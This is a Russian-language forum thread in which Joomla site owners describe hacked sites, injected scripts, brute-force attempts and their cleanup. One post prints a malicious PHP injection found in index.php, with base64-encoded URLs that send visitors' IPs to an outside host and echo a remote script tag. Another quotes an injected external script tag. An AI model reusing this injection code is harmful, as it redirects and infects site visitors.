2) провайдер сделает "Ата-та" атакующему и тот перестанет это делать
3) атакующий может съехать к другому провайдеру
4) атакующий не хакер, а жертва и заражён трояном, и его ПК нуждается в лечении его полечат.

В сети станет чуток чище и "легче дышать" ))

dormidont абсолютно точно. Какие дальнейшие планы к действиям?

Сообщить кому следует - согласен. Только если используются цепочки проксей..бесполезняк наверное
Пока сделал следующее:
1. Слил весь сайт по ftp надеясь на "ум" касперского, который вопил, указывая на заразу. Потом нашёл и пофиксил всё это файло. Оно характерно начиналось на смесь буквы+цифры и было, как я понимаю, следствием основной работы через шелл, код которого - в тех файлах, что я привёл в первом письме - к сожалению каспер пропустил. Внутри всех файлов код был одинаковый. Пример,  файл 259f6a4132.php
2. Стёр (сделав бекап) папку httpdocs/components/com_userprofiles , где лежали куски шелла (судя по дате создания аж с ноября прошлого года)
3. В админке Joomla запретил новых пользователей.
4. Забыл сказать, что хостера ещё сменил. В феврале.


А еще эти смышлёные чуваки вели походу лог всей своей "работы", кот. спокойненько лежал в файлике httpdocs/logs/jhackguard-log.php размером в 3Мбайта
Вот примеры из него:
первый пример, начало файла-лога

второй пример. тут видно, что уже как-то используется переадресация через мой сайт:

А еще эти смышлёные чуваки вели походу лог всей своей "работы", кот. спокойненько лежал в файлике httpdocs/logs/jhackguard-log.php размером в 3Мбайта

А плагин jhackguard установлен? Потому и логи писались.
Нужно было запретить в jhackguard- POST

А плагин jhackguard установлен? Потому и логи писались. Нужно было запретить в jhackguard- POST

Точно. Установлен. И, как я понимаю, он служит  как раз для того, чтобы отслеживались атаки.
Эт я протупил. Просто, когда я хостера попросил проверить сайт на вирусы, он ткнул пальцем в этот файл и сказал - вирусы тут 

Вчера с ужасом узрел поток матюков касперского при попытке зайти на сайт. Кинулся по ftp проверять файлы на которые ругается каспер. ТАк и есть. В целой куче *.js воткнут код:

а всего три дня назад в них всё было чисто 

Докладываю посление вести с полей. Сегодня ночью ещё подчистил в файле код, о котором выше говорил. Кстати, действительно удобно и быстро его искать, используя вход на сервак по SSH + mc. Сегодня  ковырял логи и что!! Обнаружил с пылу с жару, что меня брутфорсят:

Я почесал репу, спросил совета у поддержки - благо она Человеческая с большой буквы - в любое время дня и ночи. Они тут же заблокировали атакующий IP.
Дальше сижу смотрю.. в логах вижу периодическое прощупывание с левых, абсолютно разных адресов на предмет входа в админку. Типа:

Решил по свободе глянуть в логи повнимательнее на более другом хостинге. И что вы думаете вижу.. такой вот редирект, такую вот  переадресацию:

Захожу по ftp и вижу себе в корне директории файлик chmod.php такого содержания:
Это просто праздник какой-то!!  
Сайт тупой как пробка, никаких CMC, усё на html-е но даже и тут умудрились нагадить блин!

а вот так хакеры работают с пары ip-адресов:
и пробуют с анонимайзера.. интересно, неужели возможности этих сервисов столь широки, что позволяют хакать??

Дошли наконец руки прогнать проверку файло на контрольные суммы через скрипт Joomlacheck.php
Вылезла одна прицепленная к файлу /httpdocs/includes/framework.php какашка (в спойлере концовка файла):

добрый день, искал по запросам, которые в топике написанны - ничего не нашел.
в images были файлы какие-та php, от них избавился.
сайт скачивал, проверял на вирусы, все чисто.
а в исходном коде, внизу сайта
</body>
</html><script src="http://qeabaxl.knowsitall.info/rsize.js"></script>
где искать, не знаю даже, может кто подскажет?

посмотрите дописки в js файлах
посмотрите index шаблона
в php файлах вставки стороннего кода проверьте

посмотрите дописки в js файлах
посмотрите index шаблона
в php файлах вставки стороннего кода проверьте

индекс шаблона смотрел, нет ничего.
насчет js файлов, насколько мне известно, там <iframe> чаще всего ведь дописывают?
вроде по файлам искал, по запросу
<script src="http://qeabaxl.knowsitall.info/rsize.js"></script>
ничего не находил.
я так понял, что это закодированно в каком-то файле, но не представляю даже в каком может быть это.

ну искать надо

qeabaxl.knowsitall.info

а лучше по

document.write

это в js

ну искать надоа лучше поэто в js

по всем этим запросам нет ничего вредоносного. =)
по первому ничего нет.
по второму пару файлов из админки, ничего особого не увидел в них.

а в исходном коде, внизу сайта
</body>
</html><script src="http://qeabaxl.knowsitall.info/rsize.js"></script>
где искать, не знаю даже, может кто подскажет?

Проверяй файлы в корне сайта- index.php. Тут же видно что выводится код ниже тега HTML, даже не в теле страницы.

Проверяй файлы в корне сайта- index.php. Тут же видно что выводится код ниже тега HTML, даже не в теле страницы.

unction collectnewss() {

      if (!isset($_COOKIE["iJijkdaMnerys"])) {
        $value = 'yadeor';
      $ip = $_SERVER['REMOTE_ADDR'];
        $get = sql2_safe("aHR0cDovL3h4eHBvcm5vLnh4dXouY29tOjg4OC9tb3ZlLnBocD9pcD0=").$ip;
      $file = @fopen ($get, "r");
      $content = @fread($file, 1000);
      @setcookie("iJijkdaMnerys", $value, time()+3600*24);
      if (!$content)
         echo sql2_safe("PHNjcmlwdCBzcmM9Imh0dHA6Ly9wYWtlc3JyeS5pbmZvL3JzaXplLmpzIj48L3NjcmlwdD4=");
      else
         echo $content;

      }
}
collectnewss ();


вот такой код, залезал самый первый раз в индекс сайта, как бы не знал вообще про шифрование кода, потом нагуглил, ну и забыл про индекс.
Спасибо большое! Разобрался.

Доброго времени всем.
Появился на сайте вирус (шелл)  и перенаправлял на другой сайт при переходам из соц. сетей. Яндекс сообщил об опасности, а хостер по запросу выдал список заражённых файлов (все с расширением php). При попытке отредактировать один из указанных файлов в Notepad++  Касперский не давал его вообще открыть, лечил и всё и уже чистый я закачивал его обратно (файлы становились почти вдвое меньше). Два файла вылечить не удалось и я просто взял их с локалки заведомо чистые. Всё, сайт заработал, хостер подтвердил отсутствие заразы, а Яндекс убрал предупреждение об опасности. Вот так.
Стал искать пути, по которым зараза попала на сайт и кроме редактора JCE (старая версия) ничего не нашлось. Права доступа на папки в основном 640. Так что переустановка JCE, в котором были уязвимости, надеюсь решит проблемы с вирусами.
Но единственное, после переустановки редактора JCE он не появился в настройках сайта и я не могу его включить. Если кто может помочь, проблему я описал здесь, жду ответов и советов, спасибо.

Господа! Кто пробовал aibolit?
От безнадёги, пялясь в миллионы жумловского файлА, решил порпобовать..
Скриптик минут 5 пыжился и родил жутко умный отчёт. Мой моск с наскока не в состоянии был его весь сразу осилить, но что он понял сразу это про левые ссылки:

Последние 2 месяца ломают сайты клиентов.
На своем блоге поставил JHackGuard
Сегодня лог решил посмотреть и чуть не упал со стула:
Это я так понимаю брутфорсом работают и SQL иньекцию пытаются пробить?

и не просто брутфорсом работают
пробить SQL иньекцию пытаются и доступ получить

кстати на такое можно не обращать внимание если твердо уверен что нет на сайте ни чего левого и вовремя все обновляется, единственное несет в себе гадость в нагрузке на сервер, ну нагрузку сервера либо хостер настраивает, либо сами если на выделенном

кстати на такое можно не обращать внимание если твердо уверен что нет на сайте ни чего левого и вовремя все обновляется, единственное несет в себе гадость в нагрузке на сервер, ну нагрузку сервера либо хостер настраивает, либо сами если на выделенном

Нет, левого ничего нет - я уже вырос из того возраста, когда всего охот много и на халяву...
С нагрузкой думаю справимся - VPS думаю потянет.